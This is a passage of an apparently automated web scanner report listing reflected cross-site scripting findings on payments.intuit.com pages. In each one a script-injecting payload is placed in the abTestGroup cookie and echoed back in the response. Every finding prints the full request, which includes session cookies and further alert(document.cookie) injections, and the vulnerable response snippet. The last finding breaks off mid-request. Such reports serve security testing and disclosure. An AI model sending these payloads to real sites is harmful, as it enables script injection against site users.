Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f63b"><script>alert(1)</script>2bccb2fa261 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161f63b"><script>alert(1)</script>2bccb2fa261;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:57:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=u7kvfkfqvaVK6w+qzqFzsg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:34:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95981070A0805192AA117E3490D5636
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92673


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T161f63b"><script>alert(1)</script>2bccb2fa261" type="hidden" />
...[SNIP]...

1.83. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ae697<script>alert(1)</script>aec6008fd49 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ae697<script>alert(1)</script>aec6008fd49;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tAv7LIDUwQblTJIPVSG6vw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614D8C0A0805192AA117E310637E4F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151814


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16ae697<script>alert(1)</script>aec6008fd49<br />
...[SNIP]...

1.84. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671c4"><script>alert(1)</script>a7dc609c67f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16671c4"><script>alert(1)</script>a7dc609c67f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:26 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bUbasadyi6fmev5ohVeXRg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:27 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FF17B0A0805192AA117E3CEC0F01D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151828


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16671c4"><script>alert(1)</script>a7dc609c67f" type="hidden" />
...[SNIP]...

1.85. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ac6ae<script>alert(1)</script>299a08e1cc6 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ac6ae<script>alert(1)</script>299a08e1cc6;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3dHufc-Aa20gfU8Z-4d3xw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9600CF00A0805192AA117E3E54E1420
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110761


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16ac6ae<script>alert(1)</script>299a08e1cc6<br />
...[SNIP]...

1.86. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c27"><script>alert(1)</script>2c3cad478e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0c27"><script>alert(1)</script>2c3cad478e;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=og8RtTbm1WZuq3QVWh104A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E37AB0A0805192AA117E3FF7FB774
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110773


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16b0c27"><script>alert(1)</script>2c3cad478e" type="hidden" />
...[SNIP]...

1.87. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3b445<script>alert(1)</script>1d1b4924dde was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163b445<script>alert(1)</script>1d1b4924dde;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=U3+YzUdBpMmGMr2JBIzxEA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C018A0A0805192AA117E33D70DA63
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96470


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T163b445<script>alert(1)</script>1d1b4924dde<br />
...[SNIP]...

1.88. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c3d"><script>alert(1)</script>97f3c4b0963 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1647c3d"><script>alert(1)</script>97f3c4b0963;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zfKFegXLRVzqLsEN5G1LJQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC4050A0805192AA117E3D09F65EC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96483


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T1647c3d"><script>alert(1)</script>97f3c4b0963" type="hidden" />
...[SNIP]...

1.89. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83731"><script>alert(1)</script>8d0a1b75f18 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
